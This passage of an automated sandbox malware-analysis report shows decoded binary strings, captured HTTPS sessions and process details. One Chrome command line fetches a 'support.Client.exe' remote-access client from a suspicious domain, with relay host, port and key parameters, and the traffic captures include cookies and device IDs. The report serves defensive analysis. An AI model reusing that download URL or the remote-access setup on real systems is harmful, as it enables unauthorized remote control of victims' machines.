                                                                                                                                                                              Data Ascii: <>9__0_0<GetLocalAdministratorsGroupName>b__0_0<Run>b__0_0<>c__DisplayClass0_0<>9__11_0<GetNewServiceName>b__11_0<TryGetUserExpirationTime>b__11_0<>c__DisplayClass11_0<TryUninstallService>b__21_0<>c__DisplayClass12_0<>9__22_0<TrySendSas>b__22_0
                                                                                                                                                                              2024-10-29 18:35:06 UTC13016INData Raw: 41 6c 6c 6f 77 65 64 54 6f 52 65 71 75 69 72 65 43 6f 6e 73 65 6e 74 00 73 65 74 5f 49 73 55 73 65 72 41 6c 6c 6f 77 65 64 54 6f 52 65 71 75 69 72 65 43 6f 6e 73 65 6e 74 00 52 61 69 73 65 45 76 65 6e 74 00 67 65 74 5f 43 6c 69 65 6e 74 4c 61 75 6e 63 68 50 61 72 61 6d 65 74 65 72 73 43 6f 6e 73 74 72 61 69 6e 74 00 67 65 74 5f 43 6f 75 6e 74 00 47 65 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 00 48 61 6e 64 73 68 61 6b 65 54 69 6d 65 6f 75 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 00 67 65 74 5f 4c 61 73 74 4e 65 65 64 65 64 54 69 63 6b 43 6f 75 6e 74 00 73 65 74 5f 4c 61 73 74 4e 65 65 64 65 64 54 69 63 6b 43 6f 75 6e 74 00 63 75 72 72 65 6e 74 54 69 63 6b 43 6f 75 6e 74 00 74 69 6d 65 6f 75 74 54 69 63 6b 43 6f 75 6e 74 00 67 65 74 5f
                                                                                                                                                                              Data Ascii: AllowedToRequireConsentset_IsUserAllowedToRequireConsentRaiseEventget_ClientLaunchParametersConstraintget_CountGetMillisecondCountHandshakeTimeoutMillisecondCountget_LastNeededTickCountset_LastNeededTickCountcurrentTickCounttimeoutTickCountget_


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              16192.168.2.1649738204.79.197.200443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-29 18:35:42 UTC2229OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                                                                                              Origin: https://www.bing.com
                                                                                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Accept-Language: en-CH
                                                                                                                                                                              Content-type: text/xml
                                                                                                                                                                              X-Agent-DeviceId: 01000A4109009A83
                                                                                                                                                                              X-BM-CBT: 1707317755
                                                                                                                                                                              X-BM-DateFormat: dd/MM/yyyy
                                                                                                                                                                              X-BM-DeviceDimensions: 784x984
                                                                                                                                                                              X-BM-DeviceDimensionsLogical: 784x984
                                                                                                                                                                              X-BM-DeviceScale: 100
                                                                                                                                                                              X-BM-DTZ: 60
                                                                                                                                                                              X-BM-Market: CH
                                                                                                                                                                              X-BM-Theme: 000000;0078d7
                                                                                                                                                                              X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75
                                                                                                                                                                              X-Device-ClientSession: B2DC660161784379B3117A8C8CEC12A1
                                                                                                                                                                              X-Device-isOptin: false
                                                                                                                                                                              X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                                                                              X-Device-OSSKU: 48
                                                                                                                                                                              X-Device-Touch: false
                                                                                                                                                                              X-DeviceID: 01000A4109009A83
                                                                                                                                                                              X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2
                                                                                                                                                                              X-MSEdge-ExternalExpType: JointCoord
                                                                                                                                                                              X-PositionerType: Desktop
                                                                                                                                                                              X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                                                                              X-Search-CortanaAvailableCapabilities: None
                                                                                                                                                                              X-Search-SafeSearch: Moderate
                                                                                                                                                                              X-Search-TimeZone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time
                                                                                                                                                                              X-UserAgeClass: Unknown
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                              Host: www.bing.com
                                                                                                                                                                              Content-Length: 765
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHD=AF=NOFORM; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=3a628620&IPMID=1707317755885; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                                                                                                                                                                              2024-10-29 18:35:42 UTC765OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 35 30 34 37 45 35 39 34 32 42 42 32 34 36 30 45 41 33 35 42 35 33 43 43 46 37 38 44 44 42 33 44 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 35 35 66 30 38 33 62 65 65 36 39 65 34 31 39 39 38 34 37 66 33 34 64 30 37 38 38 35 62 32 61 39 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 74 6f 74 61 6c 6e 75 6d 62 65 72 4f 66 45 6e 74 72 69 65 73 22 3a 22 30 22
                                                                                                                                                                              Data Ascii: <ClientInstRequest><CID>5047E5942BB2460EA35B53CCF78DDB3D</CID><Events><E><T>Event.ClientInst</T><IG>55f083bee69e4199847f34d07885b2a9</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","totalnumberOfEntries":"0"
                                                                                                                                                                              2024-10-29 18:35:42 UTC426INHTTP/1.1 204 No Content
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                              X-MSEdge-Ref: Ref A: 8C439598C5364E1B88962E68A38D0662 Ref B: DFW30EDGE1811 Ref C: 2024-10-29T18:35:42Z
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:35:42 GMT
                                                                                                                                                                              Connection: close


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              17192.168.2.1649739204.79.197.222443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-29 18:35:46 UTC462OUTGET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1
                                                                                                                                                                              Origin: https://www.bing.com
                                                                                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Accept-Language: en-CH
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                              Host: fp.msedge.net
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-29 18:35:46 UTC428INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: public,max-age=900
                                                                                                                                                                              Content-Length: 20076
                                                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                                                              ETag: "891537008"
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Request-Context: appId=cid-v1:b183296d-485b-49fc-81c7-a511e61d1309
                                                                                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                                                                                              X-MSEdge-Ref: Ref A: A3B4495344F74E8382716A3EA417CF8E Ref B: DFW30EDGE0112 Ref C: 2024-10-29T18:35:46Z
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:35:45 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2024-10-29 18:35:46 UTC3751INData Raw: 7b 22 73 22 3a 35 30 30 30 2c 22 6e 22 3a 33 2c 22 65 22 3a 5b 7b 22 65 22 3a 22 2a 2e 61 7a 72 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 35 30 30 30 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 2a 2e 63 6c 6f 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 32 30 30 30 2c 22 6d 22 3a 31 7d 2c 7b 22 65 22 3a 22 2a 2e 63 6c 6f 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 31 30 30 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 2a 2e 6e 72 62 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 34 32 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 61 66 64 78 74 65 73 74 2e 7a 30 31 2e 61 7a 75 72 65 66 64 2e 6e 65 74 22 2c 22 77 22 3a 35 30 30 2c 22 6d 22 3a 31 7d 2c 7b
                                                                                                                                                                              Data Ascii: {"s":5000,"n":3,"e":[{"e":"*.azr.footprintdns.com","w":5000,"m":128},{"e":"*.clo.footprintdns.com","w":2000,"m":1},{"e":"*.clo.footprintdns.com","w":100,"m":128},{"e":"*.nrb.footprintdns.com","w":420,"m":3},{"e":"afdxtest.z01.azurefd.net","w":500,"m":1},{
                                                                                                                                                                              2024-10-29 18:35:46 UTC48INData Raw: 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 63 70 71 32 35 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79
                                                                                                                                                                              Data Ascii: e.com","w":3,"m":128},{"e":"cpq25prdapp02-canary
                                                                                                                                                                              2024-10-29 18:35:46 UTC4096INData Raw: 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 63 71 31 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 63 2d 72 69 6e 67 2e 6d 73 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 32 30 30 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 63 2d 72 69 6e 67 2d 66 61 6c 6c 62 61 63 6b 2e 6d 73 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 35 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 63 76 6c 30 32 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 7d 2c 7b 22 65 22
                                                                                                                                                                              Data Ascii: -opaph.netmon.azure.com","w":3,"m":128},{"e":"cq1prdapp01-canary.netmon.azure.com","w":3,"m":128},{"e":"c-ring.msedge.net","w":2000,"m":3},{"e":"c-ring-fallback.msedge.net","w":50,"m":3},{"e":"cvl02prdapp01-canary-opaph.netmon.azure.com","w":3,"m":1},{"e"
                                                                                                                                                                              2024-10-29 18:35:46 UTC4096INData Raw: 22 66 72 61 32 32 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 66 72 61 32 33 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 66 72 61 32 33 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 67 72 61 70 68 2e 61 7a 75 72 65 66 64 2e 6e 65 74 22 2c 22 77 22 3a 31 2c 22 6d 22 3a 31 7d 2c 7b 22 65 22 3a 22 67 72 61 70 68 2e 61 7a 75 72 65 66 64 2e 6e 65 74 22
                                                                                                                                                                              Data Ascii: "fra22prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"fra23prdapp01-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"fra23prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"graph.azurefd.net","w":1,"m":1},{"e":"graph.azurefd.net"
                                                                                                                                                                              2024-10-29 18:35:46 UTC4096INData Raw: 32 30 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 7d 2c 7b 22 65 22 3a 22 6e 61 67 32 30 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 7d 2c 7b 22 65 22 3a 22 6e 61 67 32 30 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 6e 61 67 32 30 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22
                                                                                                                                                                              Data Ascii: 20prdapp01-canary-opaph.netmon.azure.com","w":3,"m":1},{"e":"nag20prdapp01-canary-opaph.netmon.azure.com","w":3,"m":1},{"e":"nag20prdapp01-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"nag20prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e"
                                                                                                                                                                              2024-10-29 18:35:46 UTC3989INData Raw: 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 73 6a 63 32 32 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 73 6e 34 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 73 6e 35 61 7a 66 61 70 70 30 31 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 75 73 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 73 6e 35 61 7a 66 61 70 70 30 32 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 75 73 22 2c 22 77 22 3a 33
                                                                                                                                                                              Data Ascii: netmon.azure.com","w":3,"m":128},{"e":"sjc22prdapp02-canary.netmon.azure.com","w":3,"m":128},{"e":"sn4prdapp01-canary.netmon.azure.com","w":3,"m":128},{"e":"sn5azfapp01-canary.netmon.azure.us","w":3,"m":128},{"e":"sn5azfapp02-canary.netmon.azure.us","w":3


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              18192.168.2.164974013.107.4.254443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-29 18:35:49 UTC481OUTGET /apc/trans.gif?a75363d0418258491551ead6717ca895 HTTP/1.1
                                                                                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                                              Accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
                                                                                                                                                                              Accept-Language: en-CH
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                              Host: c-ring.msedge.net
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-29 18:35:49 UTC706INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                              Content-Length: 43
                                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                                              Last-Modified: Mon, 07 Oct 2024 03:46:52 GMT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              ETag: 0x0DA2C2C0C44B11E89E6C66FF4F731D7D
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Expose-Headers: X-EndPoint, X-FrontEnd, X-UserHostAddress, X-MSEdge-Ref, X-MachineName
                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-Endpoint: DFW30r4a
                                                                                                                                                                              X-Frontend: AFD
                                                                                                                                                                              X-Machinename: DFW30EDGE1711
                                                                                                                                                                              X-Userhostaddress: 173.254.250.0
                                                                                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                                                                                              X-MSEdge-Ref: Ref A: 569926EBD7C341DB956639EBCE5A4F0C Ref B: DFW30EDGE1711 Ref C: 2024-10-29T18:35:49Z
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:35:49 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2024-10-29 18:35:49 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                              Data Ascii: GIF89a!,D;


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              19192.168.2.164974113.107.4.254443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-29 18:35:50 UTC481OUTGET /apc/trans.gif?3d4619f8959a0bb944ce9eb8ccf482ff HTTP/1.1
                                                                                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                                              Accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
                                                                                                                                                                              Accept-Language: en-CH
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                              Host: c-ring.msedge.net
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-29 18:35:50 UTC706INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                              Content-Length: 43
                                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                                              Last-Modified: Mon, 07 Oct 2024 03:46:52 GMT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              ETag: 0x0DA2C2C0C44B11E89E6C66FF4F731D7D
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Expose-Headers: X-EndPoint, X-FrontEnd, X-UserHostAddress, X-MSEdge-Ref, X-MachineName
                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-Endpoint: DFW30r4c
                                                                                                                                                                              X-Frontend: AFD
                                                                                                                                                                              X-Machinename: DFW30EDGE1915
                                                                                                                                                                              X-Userhostaddress: 173.254.250.0
                                                                                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                                                                                              X-MSEdge-Ref: Ref A: 4948DAE5600440F1B0C4A6920141F892 Ref B: DFW30EDGE1915 Ref C: 2024-10-29T18:35:50Z
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:35:49 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2024-10-29 18:35:50 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                              Data Ascii: GIF89a!,D;


                                                                                                                                                                              Statistics

                                                                                                                                                                              CPU Usage

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Memory Usage

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                              Behavior

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              System Behavior

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:14:34:02
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:1
                                                                                                                                                                              Start time:14:34:02
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:2
                                                                                                                                                                              Start time:14:34:03
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r="
                                                                                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:3
                                                                                                                                                                              Start time:14:34:05
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5668 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:4
                                                                                                                                                                              Start time:14:34:06
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                              Imagebase:0x7ff62c440000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:7
                                                                                                                                                                              Start time:14:34:13
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                                              Imagebase:0x7ff62c440000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
